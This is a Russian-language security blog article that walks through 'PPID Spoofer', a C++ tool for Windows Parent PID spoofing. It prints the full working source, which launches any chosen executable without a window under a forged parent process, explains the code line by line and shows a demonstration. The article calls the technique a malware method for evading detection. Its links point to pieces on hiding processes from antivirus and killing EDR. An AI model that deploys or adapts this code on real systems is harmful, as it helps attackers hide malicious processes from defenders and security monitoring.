Сегодня поговорим о PPID Spoofer от S12 — инструмент для подмены идентификаторов родительских процессов (PID). Мы рассмотрим работу этого инструмента, которое может представлять серьезную угрозу для безопасности компьютерных систем.
Еще по теме: Способы прописаться в системе при пентесте
PPID спуфинг с помощью PPID Spoofer
PPID Spoofer — это новый инструмент, позволяющий порождать процессы с PID, который выглядит как PID любого выполняющегося процесса, эффективно маскируя свою деятельность и уклоняясь от обнаружения. В этой статье мы рассмотрим методологию, лежащую в основе PPID Spoofer, и механизмы, которые он использует для обмана средств защиты.
Статья в образовательных целях и предназначается для обучения этичных хакеров. При написании статьи использовались личные устройства автора. Использование техники PPID спуфинг для несанкционированного доступа к компьютерам без разрешения является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
По мере того как мы будем разбираться в сложностях этого вредоносного инструмента, мы будем изучать базовый код, отвечающий за его функционал.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
#include <windows.h> #include <iostream> #include <tlhelp32.h> #include <string> using namespace std; int получитьPIDпоИмениПроцесса(string procName) { int pid = 0; HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe32; pe32.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hSnap, &pe32) != FALSE) { while (pid == 0 && Process32Next(hSnap, &pe32) != FALSE) { if (strcmp(pe32.szExeFile, procName.c_str()) == 0) { pid = pe32.th32ProcessID; } } } CloseHandle(hSnap); return pid; } int main() { string exePath; string procName; cout << "Подделка PPID" << endl; cout << "Укажите путь к исполняемому файлу, который вы хотите запустить: "; cin >> exePath; cout << "Укажите имя процесса, который вы хотите подделать: "; cin >> procName; DWORD parentPID = получитьPIDпоИмениПроцесса(procName); STARTUPINFOEX info = { sizeof(STARTUPINFOEX) }; // Изменил sizeof(0) на sizeof(STARTUPINFOEX) PROCESS_INFORMATION processInfo; SIZE_T cbAttributeListSize = 0; PPROC_THREAD_ATTRIBUTE_LIST pAttributeList = NULL; HANDLE hParentProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, parentPID); // Открываем родительский процесс с полным доступом InitializeProcThreadAttributeList(NULL, 1, 0, &cbAttributeListSize); // Получаем размер списка атрибутов pAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, cbAttributeListSize); // Выделяем память под список атрибутов InitializeProcThreadAttributeList(pAttributeList, 1, 0, &cbAttributeListSize); // Инициализируем список атрибутов UpdateProcThreadAttribute(pAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParentProcess, sizeof(HANDLE), NULL, NULL); // Обновляем список атрибутов с родительским процессом info.lpAttributeList = pAttributeList; // Устанавливаем список атрибутов в информацию о запуске CreateProcess(NULL, (LPSTR)exePath.c_str(), NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW, NULL, NULL, reinterpret_cast<STARTUPINFO*>(&info), &processInfo); cout << endl; cout << "Процесс создан с PID: " << processInfo.dwProcessId << endl; cout << "Родительский PID: " << parentPID << endl; return 0; } |
Этот код на C++ PPID Spoofer, который реализует технику, называемую Parent PID Spoofing. Подмена родительского PID включает в себя манипуляции с идентификатором родительского процесса (PID) запущенного процесса, чтобы создать впечатление, что он порожден другим родительским процессом. Эта техника может использоваться в различных целях, но чаще всего она применяется при разработке вредоносного ПО для обхода обнаружения и маскировки происхождения вредоносных действий.
Теперь давайте разберем код по шагам:
- Функция getPIDbyProcName — принимает строковый аргумент procName, который представляет собой имя процесса, для которого необходимо получить PID. Она возвращает PID первого процесса с указанным именем, найденного в системе. Функция использует функции Windows API CreateToolhelp32Snapshot, Process32First и Process32Next из заголовка tlhelp32.h для перебора запущенных процессов и поиска PID процесса с указанным именем.
- Функция
main является точкой входа в программу и определяет логику работы инструмента «PPID Spoofer». Она выполняет следующие действия:
- a. Объявляет две строковые переменные: exePath и procName для хранения пути к исполняемому файлу, который будет порожден, и имени процесса, PID которого будет подделан, соответственно.
- b. Предлагает пользователю указать путь к исполняемому файлу, который он хочет запустить, и имя процесса, который он хочет подделать.
- c. Вызывает функцию getPIDbyProcName для получения PID указанного имени процесса и сохраняет его в переменной parentPID.
- d. Инициализирует структуру STARTUPINFOEX с именем info с расширенной информацией о запуске, которая необходима для подмены Parent PID.
- e. Инициализирует структуру PROCESS_INFORMATION с именем processInfo для хранения информации о вновь созданном процессе.
- f. Выделяет память для списка атрибутов процесса с помощью HeapAlloc и инициализирует список с помощью InitializeProcThreadAttributeList.
- g. Обновляет список атрибутов информацией о родительском процессе с помощью UpdateProcThreadAttribute, что является решающим шагом для подмены Parent PID.
- h. Устанавливает список атрибутов в структуре STARTUPINFOEX с помощью info.lpAttributeList.
- i. Создает новый процесс с расширенной информацией о запуске с помощью CreateProcess. Ему передается путь к исполняемому файлу (exePath.c_str()) и включаются флаги расширенной информации о запуске (EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW). Это создает новый процесс с указанным путем к исполняемому файлу и устанавливает Parent PID в PID родительского процесса.
- j. Наконец, программа выводит PID вновь созданного процесса и PID родительского процесса.
В целом, этот код демонстрирует, как создать новый процесс, манипулируя PID родительского процесса, что позволяет вновь созданному процессу выглядеть так, как будто он был порожден другим родительским процессом.
Давайте посмотрим, как его использовать.
Запустим блокнот:
Из mspaint.exe
Блокнот запущен, проверим его PID и PID родителя:
Работает!
Заключение
Благодаря анализу кода на C++ мы выяснили, как PPID Spoofer использует функции Windows API для подмены родительского PID вновь созданного процесса, создавая впечатление, что он происходит от другого родительского процесса. Эта техника имеет большое значение, особенно в контексте разработки вредоносного ПО, где уклонение и обфускация имеют решающее значение.
В заключение хочу сказать, что эта статья служит предостережением об опасности PPID Spoofer и о том, как важно сохранять бдительность перед лицом развивающихся киберугроз. Зная о подобных обманных практиках, мы можем предпринять активные шаги по укреплению нашей цифровой защиты и обезопасить наши системы от таких пагубных творений, как PPID Spoofer.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Как скрыть процессы от антивирусов
- Как убить процесс системы обнаружения атак (EDR)
- Принудительное завершение сторонних процессов Windows
